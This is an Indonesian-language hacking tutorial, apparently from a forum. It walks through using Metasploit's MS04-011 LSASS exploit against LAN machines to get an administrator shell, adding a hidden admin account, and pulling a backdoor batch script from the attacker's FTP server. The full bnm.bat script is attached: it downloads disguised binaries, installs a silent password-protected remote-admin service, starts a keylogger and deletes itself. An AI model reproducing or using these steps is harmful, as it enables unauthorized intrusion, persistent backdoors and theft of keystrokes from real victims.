Praktek yuk ...Peralatan yang diperlukan adalah:

* Kita pakai OS Windows saja:1. IP Scanner (SuperScan versi 3.00 lumayan handal)Download di: http://www.webattack.com/get/superscan.shtml2. Metasploit Framework for Win32 (versi terbaru 2.3)Download di: http://metasploit.com/tools/framework-2.3.exe3. FTP Server program (Pake IIS bisa, pake ArgoFTP dll. suka-suka Anda)4. Paket file Backdoor, download di:http://unique.freeunixhost.com/bnm/HeLL.tar.gz5. Remote Admininstrator Viewer, download di:http://www.famatech.com/download/rviewer3.exe6. Script buat naruh/tanam BackDoor (saya buat dengan bahasa BATCH(bnm.bat) - terlampir)

BAik mari kita mulai ...

* Download semua file yang diperlukan di atas.* Install dulu Metasploit Framework, jalankan Setup nya(framework-2.3.exe)* Install SuperScan.* Install Remote Administrator Viewer.* Extract file HeLL.tar.gz ke suatu folder, misal c:\door* Siapkan Service FTP(IIS atau yang lain, bebas). Jalankan Service.* Set FTP Home directory ke folder c:\door* Set user access Anonymousbisa mengakses Home directory.* Tes dengan membuka Explorer, di address bar ketik:ftp://localhost atauftp://[ip kita] , misal IP kita: 192.168.1.80 maka coba bukaftp://192.168.1.80

Ga ada masalah kan ?? Okey kita lanjut ...

* Selanjutnya kita cari target ... buka aplikasi IP Scanner (SuperScan)isi Range IP Start dan Stop IP misalnya mulai 192.168.1.1 sampai 192.168.55.1(tergantung keadaan Network Anda, sesuaikan sendiri range targetnya).

* Misal IP yang kita dapatkan 192.168.1.90 , 192.168.1.102,192.168.1.180 dst.* Setelah dapat daftar IP target, selanjutnya kita buka Metasploit Framework.* Setelah siap, muncul prompt: msf > ketik lah command berikut:

----- snapshot -----msf > use lsass_ms04_011 [ENTER]msf lsass_ms04_011 > set PAYLOAD win32_bind [ENTER]msf lsass_ms04_011(win32_bind) > set RHOST 192.168.1.90 [ENTER]msf lsass_ms04_011(win32_bind) > exploit [ENTER]

[*] Starting Bind Handler.[*] Detected a Windows XP target (Prof_Joni)[*] Windows XP may require two attempts[*] Sending 8 DCE request fragments...[*] Sending the final DCE fragment[*] Got connection from 192.168.1.90:4321 192.168.1.80:4444

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>_----- akhir snapshot -----

Nah, jika tampil seperti itu berarti kita sudah mendapatkan Dropped Shelldi Metasploit kita.Yang tampil disana adalah Shell dari komputer target kita ... yang terhubungsecara remote.Dimana di Shell tersebut kita punya hak akses Administrator (karena hasilexploit Buffer Overflow).

Artinya: kita punya HAk tak terbatas terhadap komputer target kita Untuk mengetes, cobak aja ketikkan di sana perintah berikut:

C:\WINDOWS\system32> NET USER LoCK /ADDC:\WINDOWS\system32> net localgroup Administrators LoCK /add

--- snapshot ---Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>NET USER LoCK /ADDNET USER LoCK /ADDThe command completed successfully.

C:\WINDOWS\system32>net localgroup Administrators LoCK /addnet localgroup Administrators LoCK /addThe command completed successfully.--- akhir snapshot ---

Tuh kan, kita bisa menambah user baru dengan group Administrator dikomputer target. hehehe Sudah ah ... nanti lagi main-mainnya ...

* Sekarang mari kita buat backdoor agak sewaktu-waktu kita bisa masukkembali ke kompie target lagi.Masih di prompt Shell DOS tadi, kita ketikkan command-command berikutini:

--> ingat dalam hal ini IP komputer kita adalah 192.168.1.80

C:\WINDOWS\system32> echo OPEN 192.168.1.80>>tmp [ENTER]C:\WINDOWS\system32> echo USER anonymous>>tmp [ENTER]C:\WINDOWS\system32> echo semb@rang.com>>tmp [ENTER]C:\WINDOWS\system32> echo GET bnm.bat>>tmp [ENTER]C:\WINDOWS\system32> echo BYE>>tmp [ENTER]C:\WINDOWS\system32> ftp -n -s:tmp [ENTER]ftp -n -s:tmpOPEN 192.168.1.80USER anonymous

GET bnm.batBYE

C:\WINDOWS\system32> bnm.bat 192.168.1.80 [ENTER]BOF=======================================================BNM's Remote Backdoor Connection Creator==========================================================Written by : UNiQUE aka. BNMLast modified : 9:49 AM 1/21/2005Last Featues : * faked r_server* sc-keylogga` added* fake-winsp3 bull-shitting* self-protection added----------------------------------------------------------

----------------------------------------------------------#1 Meracik script buat Download File-file yg diperlukan :------------------------------------------------------------- [] File script: 'bnm' telah dibuat.------------------------------------------------------------ [] Lanjut dengan Execute script 'bnm' .......bla bla bla....---------------------------------------------------------SEMUA PROSES TELAH SELESAI, HOST INI JADI MILIK ANDA---------------------------------------------------------Silahkan Remote dengan Remote Admin ke sini *** Password :andreasganteng---------------------------------------------------------SC-KeyLogga Dah ditanem di sini *** Mo panen : andreasganteng.bnm.txt---------------------------------------------------------regards./ISD_andreas AKA adul andreas strengermail : guaganteng@indonesiansecuritydown.orgchat : irc.allnetwork.org:6667 #moklet @UNiQUE---------------------------------------------------------Have Fun ... but, be responsible ... :P~--------------------------------------------------- EOF -The system cannot find the path specified.

C:\WINDOWS>------------ akhir snapshot ----------

* Nah ... BAckdoor sudah kita tanam di komputer target.Sekarang kita bisa balik kesana lagi kapan saja,buka saja aplikasi Remote Admin Viewer (radmin.exe)connect ke IP target tersebut. Pilih jenis koneksi:

* Full Remote (Full Screen)* View Only* Telnet* File Transfer* Shutdown* Restart* Logoff* delele.

* SEKIAN ... That's All Folk !!

-UNiQUE-

Shout to: #ISD #HNC #newbie - indonesiansecuritydown.org

we are not criminals

-----------------------------------------------------------------attachment:Script : Pembuat BAckdoorBahasa : Dos Batch ExecutableAuthor : UNiQUE aka BNMFileName : andreasganteng ( bnm.bat)Note : Buka Notepad copy + paste script berikut, kemudian simpandengan nama andreasganteng (bnm.bat

---------- potong mulai dibawah ini ------------------------------@ echo offclsecho==================================================================echo By Using this Script, You're AGREE alias SETUJU atas PerjanjianBerikut:echo==================================================================echo echo echo Pecho.echo TERIMA KASIH, TENKYU ... echo.echo ANY COMMENTS, SEND TO: ns1_pwd_recovery@yahoo.comecho.cd %windir%echo BOF=======================================================echo BNM's Remote Backdoor Connection Creatorecho ==========================================================echo Written by : UNiQUE aka. BNMecho Last modified : 9:49 AM 1/21/2005echo Last Featues : * faked r_serverecho * sc-keylogga` addedecho * fake-winsp3 bull-shittingecho * self-protection addedecho ----------------------------------------------------------echo.

if "%1"=="" GOTO PIYE

echo ----------------------------------------------------------echo #1 Meracik script buat Download File-file yg diperlukan :echo ----------------------------------------------------------echo open "%1">>bnmecho user anonymous>>bnmecho password>>bnmecho binary>>bnmecho get lsass32.exe>>bnmREM echo get winsp3.exe>>bnmecho get svchost32.exe>>bnmecho get firewall64.exe>>bnmecho get admdll.dll>>bnmecho get raddrv.dll>>bnmecho get kl.dll>>bnmecho bye>>bnmecho --- [] File script: 'bnm' telah dibuat.echo ---------------------------------------------------------echo --- [] Lanjut dengan Execute script 'bnm' ...echo ---------------------------------------------------------ftp -n -s:bnmecho ---------------------------------------------------------echo --- [] Selesaii ...echo --- [] Menghapus file script 'bnm'.del bnmecho ---------------------------------------------------------echo.echo ---------------------------------------------------------echo #2 Menyiapkan Serphiz Remote Admin Server :echo ---------------------------------------------------------lsass32 /pass:bnm /silence /install /saveecho --- faked r_server telah di set dengan:echo --- [] Password : andreasganteng.echo --- [] Jalan sebagai Service.echo --- [] Simpan setting ke Registry.echo --- [] Mode Silence.echo ---------------------------------------------------------echo.echo ---------------------------------------------------------echo #3 Jalankan Faked Remote Admin Server :echo ---------------------------------------------------------start lsass32.exeecho --- Service Berjalan ....echo.echo ---------------------------------------------------------echo #4 Menyiapkan Keylogga` :echo ---------------------------------------------------------start svchost32 -a -s -f andreas.phpstart firewall64echo --- SC-Keylogga` telah diset autostart dan berjalan ...echo.echo ---------------------------------------------------------echo #5 Bull Shitting WinSP3 to the LaMaz :echo ---------------------------------------------------------REM copy winsp3.exe c:\winsp3.exeecho ............. SKIPPED REM echo --- Bull Shitting selesai ...echo.ipconfigecho ---------------------------------------------------------echo SEMUA PROSES TELAH SELESAI, HOST INI JADI MILIK ANDAecho ---------------------------------------------------------echo Silahkan Remote dengan Remote Admin ke sini echo *** Password Isi aja : andreasgantengecho ---------------------------------------------------------echo SC-KeyLogga Dah ditanem di sini echo *** Mo panen, ketik : type %windir%\bnm.txtecho ---------------------------------------------------------echo ReGarDs,echo UNiQUE aka. BNMecho mail : guaganteng@indonesiansecuritydown.orgecho chat : irc.allnetwork.org:6667 #moklet @UNiQUEecho ---------------------------------------------------------echo Have Fun ... but, be responsible ... :P~echo --------------------------------------------------- EOF -del "%0"GOTO USAI:PIYEecho Parameter IP FTP Host belum dimasukkan!!echo contoh:echo %0 192.168.5.189echo.echo *** 192.168.5.189 adalah IP FTP Host berisi file andreasganteng ( backdoor)echo.echo.done